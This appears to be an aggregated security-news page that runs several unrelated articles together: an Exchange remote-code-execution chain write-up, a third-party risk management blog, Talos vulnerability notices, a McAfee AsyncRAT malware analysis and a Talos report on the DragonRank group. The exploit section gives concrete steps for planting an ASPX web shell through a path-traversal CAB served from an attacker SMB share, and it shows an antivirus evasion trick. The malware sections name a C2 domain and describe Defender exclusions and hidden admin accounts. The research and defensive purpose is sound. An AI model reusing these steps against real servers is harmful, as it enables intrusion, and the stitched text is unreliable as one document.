Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.
Most prevalent malware files from Talos telemetry over the past week
As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of 4 blog posts is meant to supplement the talk and provide additional technical details. You can read the first post in this series here.
In part 2, I describe the ApprovedApplicationCollection gadget, which was available for abuse because it did not appear on the deny list and could therefore be accessed via MultiValuedProperty. I am also presenting a path traversal in the Windows utility extrac32.exe, which allowed me to complete the chain for a full RCE in Exchange. For the moment, at least, Microsoft has made a decision not to fix this path traversal bug.
In the previous post, I described two RCE vulnerabilities, CVE-2023-21529 and CVE-2023-32031. In this post, I present the next RCE that found in Microsoft Exchange. It consists of a chain of two vulnerabilities:
• CVE-2023-36756 – a vulnerability in Exchange Server. • ZDI-CAN-21499 – an unpatched path traversal vulnerability in the Windows utility extrac32.exe.
Microsoft decided that ZDI-CAN-21499 would not be fixed as “Windows customers are not exposed to this vulnerability.” They also note that, in their view, “It is the caller's (the application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files.” As we will see in this article, though, the extrac32 issue can be used to an attacker’s advantage.
The Patch for CVE-2023-32031
While Microsoft was dealing with the ProxyNotShell chain back in 2022, I took some time to look for different classes that could be abused to exploit PowerShell Remoting for some security impact, such as RCE, file disclosure, denial of service, or NTLM relaying. I found around 30 unique classes and reported them to Microsoft.
Those submissions were marked as duplicates and were ignored, which in my opinion was a mistake. The initial patch for the ProxyNotShell included an allow list, so it seems that the deficiencies in the separate deny list did not attract the attention it should. The problem became evident later when I discovered the vulnerable MultiValuedProperty class (CVE-2023-21529). This class was present on the allow list, and it allowed me to access a separate, internal deserialization mechanism not subject to the allow list sanitation. Even after the internal MultiValuedProperty deserialization mechanism was hardened by means of the deny list, I was able to easily abuse the classes that I had reported many months before, as they had not been added to the deny list. For example, I was able to use the Command class, as I described in the previous post. I had originally reported this class to Microsoft in September 2022, but I was able to reuse this class for CVE-2023-32031 almost seven months later because it did not appear on the deny list introduced in the patch for MultiValuedProperty.
To patch CVE-2023-32031, Microsoft expanded the deny list to include all the classes that I had previously in 2022. The patch went no further than that. Critically, it still did not introduce an allow list, so it was game on. All I had to do was find another class with security impact not included in the deny list, and then I could use MultiValuedProperty to deserialize it. This became my next challenge
CVE-2023-36756 – ApprovedApplicationCollection
I was looking for classes where something potentially malicious could be reached either through a single-argument constructor or a static Parse(String) method. This approach led me to the Microsoft.Exchange.Data.Directory.SystemConfiguration.ApprovedApplicationCollection class.
As you can see, we can deliver an object of any type to the constructor. The code flow can go in multiple directions from here.
We are interested in a case where a string is provided to the constructor. When a string is provided, the code expects it to be a valid path to a file with a .cab extension. The code does not validate the path in any meaningful way except for checking the extension. The code leads to the ParseCab method, where the argument contains the attacker-supplied path:
At [1], a FileInfo object is created from the attacker’s path.
At [2] and [3], a temporary output directory is created.
At [4], the OpenCabinetFile method is called.
At [5], the entire temporary directory is deleted.
At this stage, we can confirm two things. We can deliver a UNC path, such as \\192.168.1.100\poc\poc.cab. The Exchange PowerShell Remoting requires Kerberos authentication, so the attacker most likely resides in the internal network anyway. It is rather rare to see the SMB traffic filtered internally. Thus, in most cases it will not present a challenge for the attacker to host content that the Exchange server can access over SMB.
Next, our remote path is processed by OpenCabinetFile. Let’s analyze this method.
It seems that our cabinet file is going to be extracted with the following command:
Basically, the content of our remote CAB file will be extracted to some temporary directory. Then, the entire directory will be deleted. There does not seem to be any available unsafe operations here. As we will see, though, it turns out that extrac32 has its own issues.
ZDI-CAN-21499 – Unpatched Path Traversal in extrac32
In general, we can use the ApprovedApplicationCollection internal Exchange class to extract our CAB file with the Windows utility extrac32.exe. This could lead to a file parsing bug, where the parsing part is performed by some unmanaged code. We could always try to look for memory corruptions in extrac32.exe. Before even thinking about it, I decided to go for a full-dumb option, which can be summarized with the following meme.
I simply created a CAB containing a single file, where the filename contains the path traversal sequence ..\, and tested it.
It turned out that the extrac32 extraction mechanism is vulnerable to a trivial path traversal. There is still one problem, though. The file presented in the screenshot gets detected as malicious by Windows Defender:
Luckily for the attackers, antivirus signatures are not always very smart, and this one can be easily bypassed. For example:
..\poc.txt - the CAB file gets tagged as malicious by Windows Defender.
../poc.txt - the CAB file is seen as legitimate by Windows Defender.
I reported the path traversal vulnerability to Microsoft in June of 2023. After a short discussion, we received the following final response from the vendor:
“To clarify our earlier point – it is the caller's (application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files.”
To me, this does not seem sensible. It seems like the equivalent of asking people to manually verify the contents of a ZIP file before you unzip it with one of the available solutions. However, this was Microsoft’s final reply.
The upshot was that since Microsoft clearly stated that it is going to be Exchange’s fault for the way it uses extrac32, I could use this to get a CVE in Exchange.
Chaining the Pieces
The attacker needs to do the following to exploit this vulnerability:
-- Create a malicious CAB file that contains an ASPX web shell, with the file name set to something like ../../../../../../../../inetpub/wwwroot/poc.aspx. -- Host this CAB file on an SMB share in the domain. -- Perform PowerShell Remoting deserialization, where: -- The target type is MultiValuedProperty<ApprovedApplicationCollection>. -- The argument is a UNC path pointing to our CAB file, such as: \\192.168.1.100\poc\poc.cab. -- Access the webshell and get code execution.
Fragment of the payload:
After this, you can enjoy your web shell.
As always, I have prepared a demo that presents the entire exploitation process.
Summary
In this blog post, I have presented the CVE-2023-36756 vulnerability in Microsoft Exchange Server. It allowed any authenticated attacker to achieve remote code execution by uploading a web shell.
In my next blog post, part 3 of the Exchange PowerShell Remoting series, I am going to present my CVE-2023-36745 RCE vulnerability. To make it work, I had to prepare one of the craziest chains that I have ever made, so I am excited to share it with you. Once again, you can watch my entire OffensiveCon 2024 talk here.
Performance is a critical factor in the usability and efficiency of any software, and Burp Suite is no exception. We've recently focused on enhancing Burp Suite's performance across several key areas
Hands-on security testers need the best tools for the job. Tools you have faith in, and enjoy using all day long. Burp Suite has long been that tool, and now, it's faster than ever. We’ve listened to
In today’s world, organizations are increasingly depending on their third-party vendors, suppliers, and partners to support their operations.
This way of working, in addition to the digitalization era we’re in, can have great advantages such as being able to offer new services quickly while relying on other’s expertise or cutting costs on already existing processes. However, by opening their (digital) doors to third-parties or by sending them their precious data, organizations are exposing themselves to a broader range of risks. From data breaches caused by third-parties and unauthorized accesses through third-parties to regulatory compliance failures, the organization’s risk exposure should also factor in third-party security risks.
Third-Party Risk Management (TPRM) evolves around the ability for organizations to identify, and remain in control of, the risks that emanate from working with their third-parties. In fact, relying on third-parties comes with a shared responsibility between you and your third-party of which you ultimately bear the end responsibility.
In this very first blogpost, within a series dedicated to TPRM, we’ll introduce TPRM and its key components. In the next blogposts, we will tackle specific topics and address questions you might have on TPRM.
So, what is Third-Party Risk Management?
TPRM is the process of identifying, minimizing, and keeping a control on the risks that come from working with third-parties or service providers. In very simple terms, we’re assessing the maturity of third-parties (e.g. suppliers), in terms of cybersecurity, before signing the contract with them. By “third-parties” & “service providers” we aim at any organization which either:
Manages any of your sensitive information (e.g. has access to, collects, processes, stores or archives). As example: cloud providers (IaaS, PaaS, SaaS), business service providers, etc.
Is connected to, or has access to, your internal network or systems. As example: IT services providers, etc.
Can impact the reputation of your organization in any other way based on the context of the relationship. As example: A business partner whose services you recommend to your own customers, or a business partner which hosts an internet facing website which is branded with your organization’s logo.
In building strong TPRM foundations, organizations can minimize risks before they even exist by identifying them before having signed any contract, and by asking the third-party to remediate some of the findings. Through TPRM, an organization can ensure, to some extent, the alignment of their own security requirements across the entire supply chain (whether internal or outsourced). Organizations with a mature TPRM process will also monitor the activities of their third-parties, and regularly reassess the risks.
Why should we give TPRM the right level of importance?
Our introduction so far already provides you with ideas on the importance of Third-Party Risk Management. As we said, organizations become more and more digitally interconnected and reliant on their third-parties Let us stress here the key reasons of the importance of TPRM in your security program:
Ensuring Operational Resilience: Whether a third-party has access to your internal systems in order to assist with your organization’s operation, or whether part of your operations is entirely outsourced to a third-party; an incident emanating from third-parties can heavily disrupt your activities and your ability to deliver services.
Protecting Sensitive Data: As the exchange of sensitive customer data & intellectual property between organizations increases, so does the risk of data disclosure.
Managing Reputational Risk: Data disclosures & operational continuity issues, even caused by the mistakes of a third-party, can impact the reputation of an organization; leading to loss of business opportunities & customers.
Meeting Regulatory Compliance: Many industries are subject to strict regulations and compliance requirements such as the well-known GDPR, the feared NIS2 or DORA. Engaging with non-compliant third-parties can expose organizations to compliance violations, fines, and reputational damage. Furthermore, for some industries performing Third-Party Risk Management can be a regulatory requirement on its own.
Strengthening Competitive Advantage: As customers’ and partners’ expectations on security are more & more a priority; organizations which can demonstrate a mature approach to information security, including third-party risk management, can gain the trust of their customers and stakeholders – giving them a competitive advantage.
A mature and well maintained TPRM program will make it easy to demonstrate to higher management that this is all under control.
According to ENISA’s Threat Landscape (2023), Supply Chain Attack/Third-Party Security breaches is one of the top threats to be considered. Does your organization consider it?
How to build your TPRM framework?
Based on our experience, we propose a couple of building blocks to structure your TPRM activities.
1. Obtain visibility on all your third-parties.
To start your TPRM efforts, you first need to have an eye on all the third-parties your organization is involved with. A central inventory of your third-parties is a must.
If your organization has a procurement team, they’ll typically already have such an inventory. We recommend to link your efforts with the procurement team, rather than recreate such an inventory on your side; as this will add complexity in keeping both inventories aligned. With procurement being the gatekeeper of contracts, joining forces will also help your TPRM efforts in identifying new third-parties or third-parties for which the relationship has ended.
Would your organization not yet have a procurement team, or such an inventory, clear communication & processes with the business side will be crucial for them to share with you the list of third-parties they are aware of.
2. Start from your risk management program and risk appetite to steer your efforts.
Next, you should determine your security risk appetite and use this to steer your third-party risk management efforts. Don’t be mistaken, just as with every security discipline, you will spill resources if you don’t set your focus right. Applying the concept of tiering based on inherent risk1 is crucial in this aspect (refer to 3. below).
3. Execute with operational excellence.
TPRM is often perceived, by the business wanting to contract with the third-party, as a time consuming constraint. It is of utmost importance that your TPRM program is well integrated with other existing functions within your organization, such as procurement, data protection office, IT, etc.
Running a third-party risk management program should focus based in our opinion on 3 key activities:
Assessment execution, for risk identification and analysis:
Identifying the third-parties that should be assessed based on their criticality for you (for example through tiering based on inherent risk for your organization).
Assessing the third-parties, with different assessment types, depending on this risk-type: either by sending them a security questionnaire, by conducting interviews and/or by analyzing their existing information security certifications. More companies are also providing assurance through trust portals such as SafeBase (the SafeBase Trust Center enables Security teams to proactively share and automate access to security, compliance, and privacy information/ complete security questionnaires). These assessments could be complemented with technical audits, such as PenTests or vulnerability scans.
Consider the contractual agreements that should be setup with the third-party, such as information security, data privacy or business continuity requirements. The contract could be updated to ensure the third-party’s commitment to fix the finding you have identified.
Plan for the end before it even begins. What do you expect the third-party to do once the relationship ends? Return your data to you and then delete it of course!
Set up clear agreements for third-parties on the reporting of security incidents which might affect you, so that you can easily ingest this in your standard incident response activities.
Debriefing of results & next steps:
Notifying relevant stakeholders (such as the business that will be responsible for the service) of the risk and findings (if any) that resulted from the assessment, and explaining the risk(s) of working with the third-party.
Help the stakeholders in defining an action plan to further reduce the risk (e.g. risk treatment), which they can then also coordinate with the third-party.
Monitoring of agreed actions and changes:
First aspect of monitoring, which a lot of companies are not succeeding in yet, is to monitor risk treatment by verifying the third-party effectively remediated the risks.
Your organization should also monitor the evolution of the relationship/service with the third-party. While at the beginning a service can seem ‘low risk’, new bits & pieces, such as a brand-new feature on a platform, can be added along the months or years. The once ‘low risk’ service can rapidly evolve into a ‘high risk’ service which might require you to reassess the third-party based on the updated criteria.
As we typically see companies focusing more and more on cybersecurity, it would be natural to expect companies to improve their stance in that regard. However, it is not impossible for a company’s maturity (regarding cybersecurity) to go down. So even if the service has not evolved, you should always consider reassessing your third-parties regularly.
Finally, your organization will want to define indicators to be able to monitor both:
The progress of the Third-Party security activities regarding the Third-Party portfolio and process execution (KPIs); and
The risk posture and exposure of the organization regarding its Third-Parties (KRIs).
Because measuring will allow you to identify areas for operational excellence improvement and better risk coverage.
As a lot of companies still organize their TPRM efforts mostly manually, it can be interesting to explore automation capabilities to achieve further operational excellence. For ideas on this we refer to an earlier blogpost.
Conclusion
As organizations are more and more interconnected with their third-parties and relying on them to support their operations, the need for effective Third-Party Risk Management becomes inevitable. By focusing on TPRM, organizations can minimize the risks of engaging with their third-parties and remain in control of these risks. TPRM will not only proactively protect organizations’ sensitive data, operational continuity, and reputation but will strengthen trust with the organization’s stakeholders & customers by demonstrating your control over your supply chain.
Thanks for reading our blogpost. Feel free to reach out with NVISO and in particular the dedicated Enterprise GRC team to dig further into this subject, share your feedback or discuss on how we can built something together.
Inherent risk is the natural risk level in a process that has not been controlled or mitigated in risk management. ︎
About the authors
David & Noé both joined NVISO about 5 years ago. Since then, they have worked on different TPRM projects at some of Belgium’s biggest financial institutions, including 3 years together in the same TPRM project.
Update Turns out @sixtyvividtails has already discovered the very same issue via a minimalist PE file back in June. Touche! Old Post This is a silly example of a basic mistake leading to a funny discovery… When I was experimenting … Continue reading →
Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks.
Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Microsoft AllJoyn API information disclosure vulnerability
The AllJoyn API in some versions of the Microsoft Windows operating system contains an information disclosure vulnerability.
TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine.
AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space.
Microsoft fixed this issue as part of its monthly security update on Tuesday. For more on Patch Tuesday, read Talos’ blog here.
CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.
Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution.
TALOS-2024-2011 (CVE-2024-39420) can be executed if an adversary tricks a targeted user into opening a specially crafted PDF file with malicious JavaScript embedded. This JavaScript could then trigger memory corruption due to a race condition.
Depending on the memory layout of the process this vulnerability affects, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
In cybersecurity, threats constantly evolve, and new ways to exploit unsuspecting users are being found. One of the latest menaces is a recent AsyncRAT variant, a sophisticated remote access trojan (RAT) that’s been making waves by marketing itself as cracked software. This tactic plays on the desire for free access to premium software, luring users into downloading what appears to be a harmless application. However, beneath the surface lies dangerous malware designed to infiltrate systems, steal sensitive information, and give cybercriminals complete control over infected devices.
In this blog, we’ll examine the mechanics of AsyncRAT, how it spreads by masquerading as cracked software, and the steps you can take to protect yourself from this increasingly common cyber threat.
McAfee telemetry data shows this threat has been in the wild since March 2024 and is prevalent with infected hosts worldwide.
We have many initial vectors for this chain, masquerading as different software
Asyncrat is coming in the theme of AnyDesk software. HASH: 2f1703c890439d5d6850ea1727b94d15346e53520048b694f510ed179c881f72
In this blog, we will analyze the AnyDesk-themed malware; the other noted themes are similar in nature.
Also, note that the setup.dll file shown in the above pictures is the same as it has the same hash.
Anydesk 8.0.6 Portable.exe is a 64-bit .NET file. However, it is not the original Anydesk file; it is malware.
Carried within the malware is an Anydesk.data file, the genuine anydesk application.
We can confirm that the Anydesk. data file has a valid digital signature from the publishers of Anydesk software.
When we rename the anydesk.data file to anydesk.exe, we can also see the anydesk software running.
Setup.dll is a bat file, as we can see in the above image
We start debugging by putting the malicious AnyDesk executable into the Dnspy tool to review the source code.
The primary function calls the IsAdmin function, which checks the current context of the running process. Based on this, it calls four functions in succession: AddExclusion, CopyAndRenameFile, RunScript, and ExecuteScript. We will check each function call separately.
The AddExlusion function passes the above string into the RunHiddenCommand Function.
Runhidden command will take that string, launch an instance of PowerShell, and execute that string as an argument.
This will effectively add a Windows Defender scan exclusion for the entire C drive.
The CopyAndRenameFile Function will rename the setup.dll file to the setup.bat file and copy it to the appdata\local\temp folder.
After the bat file is copied to the temp folder, it will be executed using a process start call.
Now, to convince the user that he has indeed opened the AnyDesk software, the AnyDesk.data file containing the original AnyDesk software will be renamed AnyDesk.exe.
This is the whole purpose of the malware AnyDesk.exe file. Now, the attack chains move to execute the bat script, which we will analyze further.
The bat file uses dos obfuscation
It is setting environment variables to be used later during execution.
Also, lines 6 and 7 have two long comments and an encrypted payload.
In line 13, it echoes something and pipes it to the %Ahmpty% environment variable.
We can easily deobfuscate the strings by launching an instance of cmd, executing the set commands, and echoing the contents of the variables.
One thing to note here is that %variablename% will echo the entire contents of the variable, but %varibalename:string=% will replace any occurrence of “string” in the contents of “variable name” with a null character.
The above image is after deobfuscation of all strings and formatting of the script in a human-readable form.
Script first sets @echo as off
Then, it checks if the environment variable Ajlp is set. If not, it sets Ajlp to 1 and again starts the execution of the bat script (%0 contains the path to the same script) in minimized form, exiting the original script.
Then we have our two comments, which later turn out to be encrypted payloads
Then the script checks which version of PowerShell is present on the system because, for older versions of Windows, PowerShell is sometimes located in the syswow64 folder. For successful exploitation of those versions of Windows, this check is done
Then, a long script is echoed at the end and piped for execution to PowerShell.
One interesting thing to note is that %~0 is echoed as part of the script and passed to PowerShell for execution. This trick passes the path of the bat script to the PowerShell script for further processing.
Difference b/w contents of %0 and %~0 variable, you can notice they only differ in double quotes.
Moving on to the PowerShell script, we can see it sets the PowerShell window title to the path of the bat script using the $host. UI.RawUI.WindowTitle call.
As we saw before, this path of bat script was passed to it during echo of %~0 environment variable in bat script.
Then we have some string replacement operations.
We can see the contents of the variable after the string replacement operation is done. It is being used to hide strings with malicious intent, such as invoke, load,frombase64string, etc.
Then we have a command to hide the PowerShell window
Then we have two functions. The first one is used for AES decryption, and the second one is used for Gzip decompression
Then, we have some operations that we will investigate in detail next.
Then we have two calls to System.reflection.assembly, which reflectively loads the assembly into memory.
This is the deobfuscated and high-level view of the script for easy readability.
We can see that the $lmyiu variable contains the contents of the entire bat file. It reads using the System.IO.File call, which takes a parameter of the path supplied through [console]: Title. We know the title was set to the path of the original bat script at the beginning.
Now, indexes 5 and 6 are being read from the bat file, which translates to lines 5 and 6, which contain the comments (indexing starts from 0).
Now, the first two characters are removed using substring to remove the two colons (: which represent a comment in the bat file
In the above image, we can see the output of that line, which contains the comment.
Now, the comment is converted from a base64 string and passed to a function that does AES decryption. The result is passed into a function that does GZIP decryption and stored in the assembly1 variable. The same thing happens for the second comment to get the second assembly.
Once both assemblies are decrypted, they are reflectively loaded into memory using the System.reflection.assembly call.
We can dump the two decrypted assemblies onto the disk for further analysis, as shown in the above image.
After writing to disk, we load both assemblies in CFF Explorer.
Assembly1 in CFFExplorer.
Assembly2 in CFFExplorer.
We load both assemblies into Dnspy for further debugging.
We can see that both assemblies are heavily obfuscated using Confuser Packer, and their contents are not easily readable for analysis.
This is intended to slow down the debugging process.
We will use the .NET reactor slayer to deobfuscate the two assemblies. This will remove the confusing obfuscation and give us readable assemblies.
We use it for both assemblies and write the deobfuscated versions to disk.
When we load the assemblies into Dnspy, we see they have cleaned up nicely, and confuser obfuscation is entirely removed.
We can see first it checks the console title of the current process.
We can also see a few anti-debugging API calls, IsDebuggerPresent and CheckRemoteDebuggerPresent. If any of these calls return true, the program exists.
After that, there is a call to smethod_3
Inspecting the smethod_3 function, we see some encrypted strings, all of which are being passed as arguments to the smethod_0 function.
By checking the smethod_0 function, we get the StringBuilder function, which will be used to convert the encoded strings into readable form.
We put a breakpoint on the return call to see the decoded string being populated in the local window in case it is related to a scheduled task.
Checking further, we get the call where the assembly is being written to disk in the appdata\Roaming folder with the name Network67895Man.cmd using the file.WriteAllBytes call. We can inspect the arguments in the local window.
In the above image, we see that the Network67895Man.cmd file is being executed using the process. Start call.
We can confirm that the hash of Network67895Man.cmd and our assembly are the same. We can also visually confirm that the file is in the appdata\roaming folder.
Now that we see the persistence mechanism, we can see the return value of our string builder function related to the scheduled task.
We copy the complete string and inspect it in Notepad++. We see that the PowerShell command is used to schedule a task named ‘OneNote 67895’. This will trigger At Logon, and the action is the execution of the Network67895Man.cmd file with some more parameters.
We can confirm the task being scheduled in the Task Scheduler window.
Moving on, see how the next stage is decrypted and loaded into memory
One thing to observe here is that this assembly contains a resource named P, which turns out to contain the encrypted next-stage payload.
Dumping the resource onto disk and checking its content, we see the encrypted payload bytes starting from 1F 8B 08 00…
In the local window, we can see the string P is being passed to the smethod_3 function, which will read the resource stream and the bytes of the P resource.
We can confirm that the bytes have been read from the resource and can be seen in the local window in the result variable. We can see the same bytes, i.e., 1F 8B 08 00.
Now, we put a breakpoint on the load call and inspect the contents of the raw assembly variable to see the decrypted payload.
We dump it on the desk for further inspection.
Checking it in CFF Explorer, we see this is also a 32-bit. net assembly file with internal name of stub.exe
Putting it in Dnspy, we can see an obfuscated Asyncrat client payload named AsyncClient.
We can see all the functions in clear text, like Anti-analysis, Lime logger, mutex control, etc.
This is the final Asyncrat client payload that we have got after so many layers of the attack chain.We will now see some interesting features of the Asyncrat payload.
We can see it has its own persistence mechanism, which checks if the file is running as admin. If true, it creates a scheduled task by launching cmd.exe; otherwise, it creates a run key in the Windows registry for persistence.
We can see the encrypted config of the Asyncrat client, including the port used, host, version, key, etc.
We can see the decrypt method is called on each config parameter. In the above image, we have documented the Asyncrat CNC domain that it is using, orostros.mywire.org
It turns out that this is a dynamic DNS service that the malware author is abusing to their advantage.
In conclusion, the rise of AsyncRAT and its distribution via masquerading as cracked software highlights the evolving tactics, techniques, and procedures (TTPs) employed by cybercriminals. By exploiting the lure of free software, these attackers are gaining unauthorized access to countless systems, jeopardizing sensitive information and digital assets.
Understanding these TTPs is crucial for anyone looking to protect themselves from such threats. However, awareness alone isn’t enough. To truly safeguard your digital presence, it’s essential to use reliable security solutions. McAfee antivirus software offers comprehensive protection against various threats, including malware like AsyncRAT. With real-time scanning, advanced threat detection, and continuous updates, McAfee ensures your devices remain secure from the latest cyber threats.
Don’t leave your digital assets vulnerable. Equip yourself with the right tools and stay one step ahead of cybercriminals. Your security is in your hands—make it a priority today.
Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.
DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities.
Their PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH) mechanism ensures that the legitimate file can load the PlugX without raising suspicion.
We have confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this campaign.
Talos also discovered DragonRank’s commercial website, business model and instant message accounts. We used this information to assess with medium to high confidence the DragonRank hacking group is operated by a Simplified Chinese-speaking actor.
Victimology: Countries, verticals and what is happening
Talos has recently uncovered a cluster of activity we’re calling “DragonRank” distributed across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China. They have cast a wide net in terms of industries, encompassing sectors such as jewelry, media, research services, healthcare, video and television production, manufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and even niche markets like feng shui. This broad spectrum of targets indicates a wide-reaching and non-targeted approach to their operations.
These activities employ tools and tactics, techniques, and procedures (TTPs) typically linked to Simplified Chinese-speaking hacking groups. The hacking group’s primary goal is to compromise Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is a malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users.
The threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices.
The actor takes the compromised websites and promotes them, effectively turning these sites into platforms for scam operations. The scam websites we observed in this campaign utilize keywords related to porn and sex, and the configuration data of the keywords from the command and control (C2) servers have been translated to multiple languages. Talos has confirmed more than 35 IIS servers had been compromised and acted as a conduit for this attack. The following example pictures show the configured data from C2 server and infected scam websites we observed from search engine results.
Who they are
The findings revealed that DragonRank is actively engaging in black hat SEO practices to promote their business online, thereby boosting their clients' internet visibility by unethical means. However, we discovered that the DragonRank hacking group operates differently from traditional black hat SEO cybercrime groups. These groups usually compromise as many website servers as possible to manipulate search engine traffic, but DragonRank emphasizes lateral movement and privilege escalation. Their objective is to infiltrate additional servers within the target's network and maintain control over them. We assess that they are relatively new to the black hat SEO industry, and they functioned more as a hacking group specializing in targeted attacks or penetration testing in the past.
Based on the objective DragonRank and the C2 servers extracted from their PlugX malware, we utilized relevant keywords to conduct a search engine investigation. For instance, searching "tttseo.com" on Google showed numerous instances of DragonRank’s advertisements, which had been inserted across various legitimate websites. The content of these ads consistently centered on methods for black hat SEO services. By altering our IP address to appear as if we were accessing the internet from another country (we used Japan as an example), we conducted keyword searches which confirmed that DragonRank has disseminated their targeted keywords globally. Additionally, it has come to our attention that the actor is offering services for bulk posting on social media platforms.
We reveal the DragonRank commercial website that provides a Chinese and English version of their business model. According to their introduction, their business includes white hat SEO and black hat SEO advertising channels, including cross-site ranking, single-site ranking, parasite ranking, extrapolation ranking, and search result dominance. DragonRank’s activity also covers over 200 countries and regions worldwide and can support large amounts of industry-wide advertising.
Talos also observed DragonRank sharing their contact information on Telegram and the QQ instant message application, which allows users to contact them and conduct underground business trades. This allowed us to collect information and uncover several business models and cybercrime evidence from the origin of the attacker. First, the account name is “天天推工作室” and the icon is “校长工作室”, although the names are different from two places, the meaning of them are all represent as a studio, which means they likely have the same motivations as any other traditional business. They also included a cautionary note stating to "make sure of the transaction confirmation address, as we will not be held accountable for any incorrect payments!" in their account biography.
This disclaimer gives us high confidence that DragonRank conducts their cybercriminal activities by receiving payments from customers. These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their clients' needs. Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy suited to these specifications. The group also specializes in targeting promotions to specific countries and languages, ensuring a customized and comprehensive approach to online marketing.
Although we are not entirely certain of the original attacker's location, given that the Telegram phone number is from Thailand, Talos assesses with medium to high confidence that we attribute the DragonRank hacking group to Simplified Chinese-speaking actors. The creators of the website stated that China is the “mainland,” which further bolsters our confidence assessment. This actor also operates PlugX as their backdoor malware which is a well-known backdoor that is used by multiple Chinese threat actors. Perhaps most importantly, the group uses Simplified Chinese in its promoted website, and their customer service uses Simplified Chinese to speak with customers.
The attack chain of this campaign
In this campaign, the initial entry points leveraged by the DragonRank hacking group is to take advantage of vulnerabilities in web application services, such as phpMyAdmin, WordPress, or similar web applications. Once DragonRank obtains the ability to execute remote code or upload files on the targeted site, they proceed to deploy a web shell. This grants them control over the compromised server, marking their initial foothold. The following is a screenshot, and the detected location of the web shell used in this campaign, which is identified as the open-source ASPXspy web shell.
C:\phpMyAdmin\shell.aspx
C:\AWStats\wwwroot\shell.aspx
After dropping the web shell, the group was seen utilizing it to collect system information and launch malware such as PlugX and BadIIS, as well as to run various credential-harvesting utilities that include Mimikatz, PrintNotifyPotato, BadPotato and GodPotato. The commands used by the attacker to gather system details and dump credentials are provided below.
DragonRank also breaches additional Windows IIS servers in the target’s network, either through the deployment of web shells or by exploiting remote desktop logins using acquired credentials. After accessing the other Windows IIS servers, the adversaries employ a web shell or Remote Desktop Protocol (RDP) to install PlugX, BadIIS, tools for credential dumping, and a user cloning utility tool with the aim of maintaining a low profile and ensuring persistence within their network. We also notice on one of the compromised servers that DragonRank uses a utility tool to clone an administrator's permissions to a guest account to elevate a guest account to have administrator privileges within a compromised system and execute the credential-dumping tool. The full attack chain diagram is shown below.
Five months following the initial breach, DragonRank re-engaged with one of the previously compromised IIS servers with a previously deployed web shell to verify its operational status and ensure the server still possessed the necessary permissions required for their activities. The verification process involved several steps: downloading a web shell onto the system, retrieving the host name and acquired credentials, adding a hidden administrator account, denoted as “admin$”, disabled and re-enabled RDP to facilitate remote control and cover their tracks by deleting the “admin$” account in the end. The following commands are shown below.
PlugX serves as the primary backdoor used by this hacking group in this campaign. They utilized DLL sideloading technique, exploited vulnerable legitimate binaries to initiate the PlugX loader, which is consistent with the method described in this report. We have outlined the execution flow of the PlugX malware based on our telemetry data and the payload that was discovered on VirusTotal.
Although this PlugX relies on the familiar sideloading technique with previous PlugX loaders, there still have a few significant modifications to the PlugX loader component in this campaign. The first one is about the loader using the "TopLevelExceptionFilter" function — a SEH mechanism for managing top-level exceptions — to ensure the legitimate file can effectively load the PlugX loader. This technique ensures that the legitimate file can load the PlugX loader without raising suspicion. By integrating with SEH, PlugX can intercept exceptions that occur during program execution, which can be used as a form of error handling or to obfuscate malicious activities. Leveraging the built-in exception handling mechanism of Windows to bypass security measures, making it more difficult for antivirus products and other security tools to detect malicious behavior. The use of SEH by PlugX demonstrates the sophistication of the malware and ensures their PlugX malware is persistent and stealth within a compromised system.
When the PlugX loader is successfully sideloaded by the legitimate binary, the PlugX loader conducts its search for the payload in three distinct locations. The initial search area is the directory where the loader itself resides. The second location is within the system registry under "HKEY_LOCAL_MACHINE\SOFTWARE\bINARy," specifically looking for the value "Acrobat.dxe." The third location is a similar registry path but under "HKEY_CURRENT_USER\SOFTWARE\bINARy," again checking for the value "Acrobat.dxe." Once the payload is found in any of these locations, the PlugX loader will proceed to load, decrypt using the XOR algorithm with the key "0xD1," and then inject it into the virtual allocated memory block. The PlugX payload will connect to the C2 server and execute in the memory to avoid being detected by the radar.
